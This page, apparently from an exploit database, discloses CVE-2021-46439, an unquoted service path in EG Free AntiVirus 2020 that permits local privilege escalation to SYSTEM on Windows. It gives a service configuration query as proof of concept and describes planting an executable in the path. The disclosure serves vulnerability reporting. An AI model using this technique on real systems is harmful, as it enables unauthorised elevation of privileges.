[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

EG Free AntiVirus 2020 Privilege Escalation / Unquoted Service Path Vulnerabilities

Author
Shahrukh Iqbal Mirza
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-37568
Category
local exploits
Date add
31-03-2022
CVE
CVE-2021-46439
Platform
windows
# Exploit Title: EG Free AntiVirus v2020 - Unquoted Service Path (Local Privilege Escalation)
# Exploit Author: Shahrukh Iqbal Mirza (@shahrukhiqbal24)
# Vendor Homepage: http://www.egsoftweb.in/index.aspx
# Software Link: http://www.egsoftweb.in/OurProduct_Readmore.aspx?id=6
# Version: 2020
# Tested: Windows 10 (x64)
# CVE: CVE-2021-46439

-------------
Description:
-------------

EG Free AntiVirus (v2020) installs a service (WinSEGAV AutoConfig) with
an unquoted service path. Since this service is running as SYSTEM, it
creates a local privilege escalation vulnerability. To properly exploit
this vulnerability, a local attacker must insert an executable in the
path of the service. Rebooting the system or restarting the service
will run the malicious executable with elevated privileges.

------------------
Proof of Concept:
------------------

C:\Users\shah>sc qc  “WinSEGAV AutoConfig”
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: WinSEGAV AutoConfig
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\EGSoftWeb\EG Anti
Virus\egavser.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Windows Service For EG Free AntiVirus
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem


Best regards,
Shahrukh Iqbal Mirza.

#  0day.today [2024-12-23]  #